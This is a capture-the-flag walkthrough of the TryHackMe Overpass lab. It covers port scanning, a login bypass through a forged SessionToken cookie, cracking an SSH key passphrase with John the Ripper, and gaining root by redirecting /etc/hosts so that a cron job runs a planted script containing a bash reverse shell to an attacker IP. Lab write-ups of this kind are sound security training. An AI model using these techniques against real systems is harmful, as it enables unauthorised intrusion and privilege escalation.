TryHackMe|Overpass

Sampath Pendurthi
5 min read · Mar 5, 2021

Hello everyone, let’s solve the Overpass series. The Overpass series is one of the best sets of machines I have ever solved. OK, let’s begin.

This is the first machine in the Overpass series. It is rated easy to solve and comes with two flags.

Let’s begin.

I’m using Ubuntu as my attacker machine.

First, let’s find the open ports and their service versions using nmap:

“nmap -sC -sV <IP> -oN scan -vv”

OK, we have two open ports: 22 (SSH) and 80 (HTTP).

Let’s look for anything interesting on that website.

It’s just a plain website; nothing found here. So let’s brute-force some directories. I’m using gobuster for directory discovery.

“gobuster -u http://<IP> -w /usr/share/dirb/wordlists/common.txt -t 50”

After running gobuster I have some interesting directories.

OK. There is an admin panel, but we don’t have any credentials to log in. Still, I found something interesting here.

Let’s have a look at the login page.

OK, we have no username or password, but when we go through the page source we find some interesting JavaScript.

OK. There is a main.js, a login.js and a cookie.js. Looking at the code in login.js, I found this.

Let’s observe this very closely. I spent most of my time here, as I’m very new to JavaScript. Let me explain the code. First it takes the input and assigns it to some const variables, which cannot be changed afterwards. Then it sends the credentials to the API. If the credentials are wrong it prints “Incorrect Credentials”; if they are correct it sets a SessionToken cookie. No particular value is ever checked for the SessionToken, only that the cookie exists. So let’s try creating a SessionToken cookie ourselves to bypass the login.

Presently there are no cookies, so we’ll create one.

OK, I’ve created a cookie named “SessionToken” and set its value to some random numbers. Since the JavaScript only creates a cookie with the name SessionToken and no particular value is defined for it, you can set it to anything you want. Now let’s refresh the admin page.

OK, we’ve got an SSH private key. But it is encrypted using some “military grade encryption”, and I don’t know what kind of encryption it is.

Before brute-forcing the private key we need to convert it into a hash using the ssh2john tool. It is a Python script that ships with John the Ripper, so locate it in your John directory and run it. Now we have the hash, but we still need to find out what the “military grade encryption” is.

“python ssh2john.py id_rsa > hash”

OK. Let’s open the hash.

This is the hash. Let’s crack it using John the Ripper.

“john hash --wordlist=rockyou.txt”

I built my John from source on Ubuntu, so my setup will differ from yours, but the above command will work for you.

OK, we got the password. Now let’s log in as james using the key and this password.

“ssh -i id_rsa james@<IP>”

OK, we are in as james. If we list the files in the current directory, we find our first flag.

OK, we are done with flag 1. Now it’s time for privilege escalation. I’m a little weak in this part. Without any delay, let’s explore this machine a bit and then look at privesc. We have a todo text file; let’s open it.

“cat /home/james/todo.txt”

Sorry, I forgot to take a screenshot here, so I took it after completing the lab. That’s why it shows root; don’t mind that. Now let’s dig in.

OK. This says paradox created some automated tasks, but they are not updating the website. To find the automated tasks, let’s open the crontab.

“cat /etc/crontab”

OK, here is the crontab. It runs a buildscript, but the script is fetched by domain name. I searched for it but found nothing. This took me a while to figure out, but unfortunately my knowledge was not enough, so I went through a writeup and got it. As we can see there is a domain name, so let’s open the /etc/hosts file to check. The domain resolves to localhost. Now we’ll change that IP address to our own machine’s IP and create buildscript.sh at the same path mentioned in the crontab.

“nano /etc/hosts”

So I’ve added my IP address to the hosts file. Now let’s start our server and create downloads/src/buildscript.sh.

Now let’s place our bash reverse shell here.

“echo "bash -i >& /dev/tcp/10.0.0.1/4242 0>&1" > buildscript.sh”

Now let’s set up a listener using netcat.

“nc -lvnp 4242”

Once the cron job executes the script, we get a root shell.

“cat /root/root.txt”

We get the flag. Done.

THANK YOU……

If you have any doubts Let me know.

Insta:https://www.instagram.com/sampath.pendurthi/

LinkedIN:https://www.linkedin.com/in/sampath-pendurthi/

HAPPY HACKING…..

PEACE……..
